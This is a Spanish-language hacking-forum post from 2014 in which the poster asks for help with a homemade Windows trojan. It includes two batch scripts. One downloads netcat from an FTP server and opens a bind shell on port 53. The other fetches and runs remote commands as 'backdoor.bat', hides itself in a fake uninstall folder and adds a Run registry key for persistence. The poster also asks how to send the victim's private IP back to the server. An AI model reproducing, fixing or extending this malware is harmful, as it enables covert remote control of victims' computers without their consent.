Ayuda con un Troyano?

Iniciado por 00000, Diciembre 23, 2014, 12:44:36 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Buenas!.
La cuestión es la siguiente, tengo la duda de como programar un troyano de conexión directa del Cliente a un servidor FTP. En donde el Cliente ejecuta un  BATCH (o convertido a  .exe) , se conecta al servidor FTP , pide la descarga de un archivo en BATCH que contiene el siguiente codigo:


Código: php
[i]@echo off
echo USUARIO FTP>ftp1.txt
echo CONTRASEÑA FTP>>ftp1.txt
echo get nc.exe %appdata%/nc.exe
ftp -s:ftp1.txt FTP.SERVIDOR.COM
del /f /q ftp1.txt
%appdata%/nc.exe -l -p 53 -d -e cmd.exe
del /f /q %0[/i]



como ven este codigo almacena la herramienta NETCAT en el directorio %appdata% de win7 etc... y luego ejecuta un comando de escucha del puerto 53 con la consola de comandos de win habilitada.

Por otra parte este es el codigo del ejecutable que se le envia al Cliente ("victima"):


Código: php
[i]@echo off
pushd "%windir%\$NtUninstallWudf01000$\spuninst"
echo USUARIO FTP>ftp.tmp
echo CONTRASEÑA FTP>>ftp.tmp
echo get ordenes.txt>>ftp.tmp
echo bye>>ftp.tmp
echo quit>>ftp.tmp
ftp -s:ftp.tmp FTP.SERVIDOR.COM
del /f /q ftp.tmp
rename ordenes.txt backdoor.bat
start backdoor.bat
pushd "%homepath%\Mis documentos\Mis archivos recibidos"
copy /Y "troyano.bat" "%windir%\$NtUninstallWudf01000$\spuninst\troyano.bat"
reg
add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Uninstall"
/t Reg_SZ /d "%windir%\$NtUninstallWudf01000$\spuninst\troyano.bat
/f"
exit[/i]


La cuestion es que una vez que el Cliente de win7 ejecuta el troyano, este se conecta al FTP parece que esta todo OK. PERO!, el fichero nc.exe nunca se genera en el %appdata%.
Tambien mi duda era, como hacer con este troyano para que se me envie al FTP informacion de la IP PRIVADA del Cliente.
GRACIAS DE ANTEMANO.